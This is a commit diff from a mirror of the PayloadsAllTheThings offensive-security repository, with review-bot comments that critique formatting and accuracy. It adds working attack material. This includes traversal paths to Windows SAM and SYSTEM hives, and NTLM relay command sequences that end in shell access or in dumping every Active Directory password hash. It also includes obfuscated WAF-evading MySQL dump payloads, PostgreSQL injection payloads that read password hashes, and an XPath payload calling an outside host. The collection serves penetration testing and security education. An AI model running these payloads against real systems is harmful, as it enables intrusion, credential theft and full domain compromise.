mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-29 15:55:25 +00:00
commit
34d8853728
Directory Traversal
Methodology and Resources
SQL Injection
Server Side Request Forgery
XPATH Injection
XSS Injection
XXE Injection
@ -144,6 +144,8 @@ c:/unattend.txt
|
||||
c:/unattend.xml
|
||||
c:/unattended.txt
|
||||
c:/unattended.xml
|
||||
c:/windows/repair/sam
|
||||
c:/windows/repair/system
|
||||
```
|
||||
|
||||
The following log files are controllable and can be included with an evil payload to achieve a command execution
|
||||
|
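Review bot: the two new entries `c:/windows/repair/sam` and `c:/windows/repair/system` only pay off as a pair, and the list does not say so: the SAM hive is encrypted with the boot key kept in the SYSTEM hive, so a traversal that reads `repair/sam` alone yields nothing crackable. A short comment after the two lines (`# need both: SYSTEM holds the bootkey that decrypts SAM`) would save readers a wasted request, as would noting that `repair\` holds setup-time backup copies that are often stale or missing on current Windows, while the live hives under `system32/config/` are locked while the OS runs.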
@ -23,6 +23,9 @@
|
||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
* [SMB Signing Disabled](#smb-signing-disabled)
|
||||
* [Drop the MIC](#drop-the-mic)
|
||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
* [Unconstrained delegation](#unconstrained-delegation)
|
||||
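Review bot: the three new summary entries (`MS08-068 NTLM reflection`, `SMB Signing Disabled`, `Drop the MIC`) point at `####` sub-headings of `### NTLMv2 hashes relaying` but are listed as top-level bullets beside their parent, so the summary no longer mirrors the heading hierarchy; indent them one level under the `NTLMv2 hashes relaying` entry. The anchors themselves (`#ms08-068-ntlm-reflection`, `#smb-signing-disabled`, `#drop-the-mic`) match the new headings.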
@ -658,12 +661,93 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
|
||||
### NTLMv2 hashes relaying
|
||||
|
||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||
|
||||
| Hash | Hashcat | Attack method |
|
||||
|---|---|---|
|
||||
| LM | 3000 | crack/pass the hash |
|
||||
| NTLM/NTHash | 1000 | crack/pass the hash |
|
||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
||||
|
||||
#### MS08-068 NTLM reflection
|
||||
|
||||
NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
|
||||
|
||||
> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.
|
||||
|
||||
* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
|
||||
|
||||
```powershell
|
||||
msf > use exploit/windows/smb/smb_relay
|
||||
msf exploit(smb_relay) > show targets
|
||||
```
|
||||
|
||||
#### SMB Signing Disabled
|
||||
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||
|
||||
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||
```powershell
|
||||
[Responder Core]
|
||||
; Servers to start
|
||||
...
|
||||
SMB = Off # Turn this off
|
||||
HTTP = Off # Turn this off
|
||||
```
|
||||
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
4. Wait for a shell
|
||||
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
|
||||
```powershell
|
||||
ntlmrelayx.py -tf targets.txt
|
||||
```
|
||||
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
|
||||
```powershell
|
||||
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
|
||||
[*] Servers started, waiting for connections
|
||||
Type help for list of commands
|
||||
ntlmrelayx> socks
|
||||
Protocol Target Username Port
|
||||
-------- -------------- ------------------------ ----
|
||||
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
|
||||
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
|
||||
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
|
||||
|
||||
$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
||||
> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
|
||||
|
||||
Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
|
||||
|
||||
```powershell
|
||||
python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
||||
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
|
||||
[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
|
||||
```
|
||||
|
||||
- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
|
||||
```powershell
|
||||
TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local <attacker ip/hostname>
|
||||
TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
|
||||
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
|
||||
```
|
||||
|
||||
|
||||
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
|
||||
```powershell
|
||||
# create a new machine account
|
||||
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
|
||||
TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
|
||||
TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
|
||||
|
||||
# connect using the ticket
|
||||
export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
|
||||
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
||||
```
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
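Review bot: the SMB Signing Disabled procedure numbers two consecutive steps `4.` (`Wait for a shell` and `Also you can use ntlmrelayx ...`), so the list should run `4.`/`5.`/`6.`. In the same hunk, `NTLM reflection vulnerability in the SMB protocolOnly targeting ...` is missing a sentence break (`... in the SMB protocol. Only targets Windows 2000 to Windows Server 2008.`), `act as a SOCK proxy with every compromised sessions` should read `act as a SOCKS proxy for every compromised session`, and the `Responder.conf` excerpt is an INI file fenced as `powershell`. One technical point is worth a sentence in the Drop the MIC examples: the first relays to `ldap://s2016dc...` while the second relays to `ldaps://rlt-dc...` with no explanation; `--escalate-user` only edits an ACL and works over plain LDAP, whereas `--delegate-access` creates a computer account and sets its password, which the DC only accepts over an encrypted (LDAPS) connection, so the scheme is not interchangeable between the two. Finally, the `# create a new machine account` comment sits above the `ntlmrelayx.py ... --delegate-access` line but the account is created by that relay step itself, not by a separate command; rewording it to `# --delegate-access creates the machine account and grants it RBCD on the victim` avoids readers looking for a missing `addcomputer` step.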
@ -1043,3 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
|
||||
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
|
||||
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
|
||||
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
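Review bot: the new `Playing with Relayed Credentials - June 27, 2018` entry has no author while the neighbouring entries follow `Title - Author - Date`; add the author, and use one date format across the three added lines (the hunk mixes `June 27, 2018` and `Jun 11, 2019`).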
@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51
|
||||
|
||||
-- M@dBl00d
|
||||
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
|
||||
|
||||
-- Zen
|
||||
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
|
||||
|
||||
-- Zen WAF
|
||||
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
|
||||
|
||||
-- ~tr0jAn WAF
|
||||
+concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+
|
||||
|
||||
-- ~tr0jAn Benchmark
|
||||
+concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+
|
||||
|
||||
-- N1Z4M WAF
|
||||
+/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f
6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+
|
||||
|
||||
-- sharik
|
||||
(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
|
||||
```
|
||||
|
||||
## MYSQL Current queries
|
||||
|
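Review bot: the new one-shot dump payloads are walls of hex with only an author tag (`-- M@dBl00d`, `-- Zen WAF`, ...) as description; a one-line comment per payload saying what it returns (tables+columns, databases+tables+columns, server variables) would make the section usable without decoding each one. In particular the `~tr0jAn WAF` and `N1Z4M WAF` payloads embed HTML markup and attribution banners (`0x7e7472306a416e` decodes to `~tr0jAn`, `0x496e6a6563746564206279204e315a344d` to `Injected by N1Z4M`) that a tester would normally strip, the `N1Z4M` payload calls `UUID()` twice under two different labels, and the `+`, `%0a` and `%2b` sequences are URL encoding for a GET parameter, so these lines are not valid SQL as pasted into a client. Worth saying explicitly that the `/*!12345 ... */` and `/*!13337 ... */` version-comment tricks are MySQL-specific.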
@ -3,9 +3,20 @@
|
||||
## Summary
|
||||
|
||||
* [PostgreSQL Comments](#postgresql-comments)
|
||||
* [PostgreSQL version](#postgresql-version)
|
||||
* [PostgreSQL Current User](#postgresql-current-user)
|
||||
* [PostgreSQL List Users](#postgresql-list-users)
|
||||
* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
|
||||
* [PostgreSQL List Database Administrator Accounts](#postgresql-list-database-administrator-accounts)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL database name](#postgresql-database-name)
|
||||
* [PostgreSQL List databases](#postgresql-list-database)
|
||||
* [PostgreSQL List tables](#postgresql-list-tables)
|
||||
* [PostgreSQL List columns](#postgresql-list-columns)
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
||||
* [PostgreSQL File Read](#postgresql-file-read)
|
||||
* [PostgreSQL File Write](#postgresql-file-write)
|
||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||
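Review bot: the `PostgreSQL List databases` summary entry links to `#postgresql-list-database`, which matches the `## PostgreSQL List Database` heading used in the body, but the label and the heading disagree in number; make them agree (either `List Databases` with anchor `#postgresql-list-databases` in both places, or keep the singular in the summary). The other new anchors match their headings.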
@ -20,13 +31,79 @@
|
||||
/**/
|
||||
```
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
SELECT version()
|
||||
```
|
||||
|
||||
## PostgreSQL Current User
|
||||
|
||||
```sql
|
||||
SELECT user;
|
||||
SELECT current_user;
|
||||
SELECT session_user;
|
||||
SELECT usename FROM pg_user;
|
||||
SELECT getpgusername();
|
||||
```
|
||||
|
||||
## PostgreSQL List Users
|
||||
|
||||
```sql
|
||||
SELECT usename FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL List Password Hashes
|
||||
|
||||
```sql
|
||||
SELECT usename, passwd FROM pg_shadow
|
||||
```
|
||||
## PostgreSQL List Database Administrator Accounts
|
||||
```sql
|
||||
SELECT usename FROM pg_user WHERE usesuper IS TRUE
|
||||
```
|
||||
## PostgreSQL List Privileges
|
||||
|
||||
```sql
|
||||
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT current_database()
|
||||
```
|
||||
|
||||
## PostgreSQL List Database
|
||||
|
||||
```sql
|
||||
SELECT datname FROM pg_database
|
||||
```
|
||||
|
||||
## PostgreSQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM information_schema.tables
|
||||
```
|
||||
|
||||
## PostgreSQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
|
||||
```
|
||||
|
||||
## PostgreSQL Error Based
|
||||
|
||||
```sql
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
|
||||
' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
|
||||
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
|
||||
```
|
||||
|
||||
## PostgreSQL Blind
|
||||
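Review bot: in the Error Based block, the line `,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)...` compares `table_name` against the `data_column` placeholder and is immediately followed by the correct `table_name='data_table'` variant, so it reads as a copy error and should be dropped. Two caveats would also help: `SELECT usename, passwd FROM pg_shadow` only works as a superuser (other roles get a permission error, and `pg_user` shows `passwd` as `********`), and the `cast(... as int)` error-based lines leak data through the error text, so they need the application to return database errors to the client. Minor: `getpgusername()` is a legacy alias of `current_user`; fine to list, but flag it as such.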
@ -43,6 +120,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
||||
|
||||
## PostgreSQL Stacked Query
|
||||
|
||||
Use a semi-colon ";" to add another query
|
||||
|
||||
```sql
|
||||
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
|
||||
```
|
||||
|
||||
## PostgreSQL File Read
|
||||
|
||||
```sql
|
||||
|
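Review bot: the Stacked Query example is a full HTTP URL fenced as `sql`; either fence it as plain text or put only the injected fragment (`';create table NotSoSecure (data varchar(200));--`) in the sql fence. A sentence that stacking depends on how the application submits the query would also help: it works when the query goes over the simple protocol as one multi-statement string (e.g. PHP `pg_query`), while drivers that use prepared or extended-protocol queries reject a second statement, so a failed stack does not rule out injection.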
@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||
```
|
||||
|
||||
No Equal - bypass using LIKE/NOT IN/IN
|
||||
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
|
||||
|
||||
```sql
|
||||
?id=1 and substring(version(),1,1)like(5)
|
||||
?id=1 and substring(version(),1,1)not in(4,3)
|
||||
?id=1 and substring(version(),1,1)in(4,3)
|
||||
?id=1 and substring(version(),1,1) between 3 and 4
|
||||
```
|
||||
|
||||
Blacklist using keywords - bypass using uppercase/lowercase
|
||||
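Review bot: the new `?id=1 and substring(version(),1,1) between 3 and 4` example is only true when `version()` starts with `3` or `4`, which no current MySQL release does (`5` or `8`); use `between 5 and 8` or say the bounds are placeholders. All four lines also rely on MySQL implicitly casting the one-character string to a number, which is why `like(5)` and `in(4,3)` work without quotes; one line saying so would stop readers porting the trick to databases that do not do that cast.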
@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
|
||||
```sql
|
||||
AND -> &&
|
||||
OR -> ||
|
||||
= -> LIKE,REGEXP, not < and not >
|
||||
= -> LIKE,REGEXP, BETWEEN, not < and not >
|
||||
> X -> not between 0 and X
|
||||
WHERE -> HAVING
|
||||
```
|
||||
|
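Review bot: the two BETWEEN equivalences added here are only partially equivalent and the table should say so: `=` maps to `BETWEEN X AND X` (the bare `BETWEEN` entry does not say both bounds must be the same value), and `> X -> not between 0 and X` is also true for any value below 0, so it only substitutes for `> X` when the compared value is known to be non-negative, which holds for the `substring(version(),...)` digit examples above but not in general.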
@ -8,17 +8,17 @@
|
||||
* [Payloads with localhost](#payloads-with-localhost)
|
||||
* [Bypassing filters](#bypassing-filters)
|
||||
* [Bypass using HTTPS](#bypass-using-https)
|
||||
* [Bypass localhost with [::]](#bypass-localhost-with----)
|
||||
* [Bypass localhost with [::]](#bypass-localhost-with-)
|
||||
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
|
||||
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
|
||||
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
|
||||
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding)
|
||||
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
|
||||
* [Bypass using malformed urls](#bypass-using-malformed-urls)
|
||||
* [Bypass using rare address](#bypass-using-rare-address)
|
||||
* [Bypass using bash variables](#bypass-using-bash-variables)
|
||||
* [Bypass using tricks combination](#bypass-using-tricks-combination)
|
||||
* [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)
|
||||
* [Bypass filter_var() php function](#bypass-filter-var-php-function)
|
||||
* [Bypass filter_var() php function](#bypass-filter_var-php-function)
|
||||
* [Bypass against a weak parser](#bypass-against-a-weak-parser)
|
||||
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
|
||||
* [file://](#file)
|
||||
|
@ -1,6 +1,14 @@
|
||||
# XPATH injection
|
||||
|
||||
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
||||
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
|
||||
|
||||
## Summary
|
||||
|
||||
* [Exploitation](#exploitation)
|
||||
* [Blind exploitation](#blind-exploitation)
|
||||
* [Out Of Band Exploitation](#out-of-band-exploitation)
|
||||
* [Tools](#tools)
|
||||
* [References](#references)
|
||||
|
||||
## Exploitation
|
||||
|
||||
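Review bot: turning the intro sentence into a `>` blockquote presents it as a quotation without an attribution; it is OWASP's definition, and the OWASP page is already in the References section, so add the source after the quote (`- OWASP`) so the quotation marks something.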
@ -24,16 +32,31 @@ x' or name()='username' or 'x'='y
|
||||
|
||||
## Blind Exploitation
|
||||
|
||||
```sql
|
||||
1. Size of a string
|
||||
and string-length(account)=SIZE_INT
|
||||
|
||||
```sql
|
||||
and string-length(account)=SIZE_INT
|
||||
```
|
||||
2. Extract a character
|
||||
substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
```sql
|
||||
substring(//user[userid=5]/username,2,1)=CHAR_HERE
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
```
|
||||
|
||||
## Out Of Band Exploitation
|
||||
|
||||
```powershell
|
||||
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
|
||||
```
|
||||
|
||||
## Tools
|
||||
|
||||
- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents
|
||||
- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool
|
||||
- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text
|
||||
- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer)
|
||||
- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
|
||||
|
||||
## References
|
||||
|
||||
* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010))
|
||||
* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/)
|
||||
* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
|
||||
|
